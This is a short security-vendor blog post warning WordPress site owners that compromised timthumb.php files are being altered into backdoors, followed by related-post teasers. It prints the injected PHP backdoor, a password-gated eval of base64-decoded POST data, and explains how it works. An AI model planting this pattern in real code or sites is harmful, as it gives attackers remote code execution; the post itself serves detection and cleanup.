TimThumb.php backdoor

If your site got compromised lately with the TimThumb.php vulnerability, make sure to check that script to see if it was not modified to act as a backdoor as well.

We are seeing in many sites the timthumb.php with the following code added to it:

if (md5 (md5($_POST[‘p’]))===’xxx8ab2ab.. a4ec61072xxx’)
die (eval ( base64_decode ($_POST[‘c’])));

If you are not sure what this code does, it receives a password via the “p” POST and if it is correct, it executes any PHP code sent by the attackers in the “c” POST variable.
For more information about backdoors, we did a nice post about them: ASK Sucuri: What about the backdoors?

David Dede

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Related Tags

JavaScript Injections Leads to Tech Support Scam

Krasimir Konov
February 9, 2017

During a recent malware investigation, we found some interesting obfuscated Javascript code. This code pretends to appear as part of the popular AddThis social sharing…

Read the Post

Vulnerable Plugins: June 2020 Update

John Castro
June 19, 2020

This is a mid-month update to our regular Monthly Vulnerability Digest, which reveals a number of new patches for disclosed vulnerabilities. Plugin Vulnerability Patched Version…

Read the Post

Stored XSS in MyBB <= 1.8.20

Marc-Alexandre Montpas
June 11, 2019

The open source PHP forum software myBB recently published a new update, version 1.8.21. This is a security release fixing a Stored XSS vulnerability in…

Read the Post

Password Attacks 101

Cesar Anjos
June 11, 2021

According to the 2020 Data Breaches report by Verizon, 25% of all breaches involved the use of stolen credentials. And for small businesses, that number…

Read the Post

What are Website Backdoors?

Juliana Lewis
June 26, 2018

When a site gets compromised, the attackers will often leave some piece of malware behind to allow them access back to the site. Hackers want…

Read the Post

WordPress Mass Password Changer

Luke Leal
January 14, 2020

Our team recently came across a password changer for WordPress that allows attackers to modify WordPress user passwords within a compromised environment. By default, the…

Read the Post

WordPress Admin Creator – A Simple, But Effective Attack

Kayleigh Martin
December 1, 2021

Malicious admin users get added to vulnerable WordPress sites often. This can happen in a variety of different ways, and sometimes the malware that creates…

Read the Post

What is Steganography? How Hackers Hide Malware On Websites

What is Steganography? (Or, How Hackers Hide Malware On Websites)

Rianna MacLeod
May 2, 2023

As a child, I loved sending secret messages to my friends using invisible ink. A quick squeeze of lemon juice was all I needed to…

Read the Post

How Websites Are Used to Spread Emotet Malware

Luke Leal
December 18, 2019

In past posts, we’ve discussed the more popular reasons why hackers target smaller websites. Today, we’ll focus instead on how hackers use compromised websites to…

Read the Post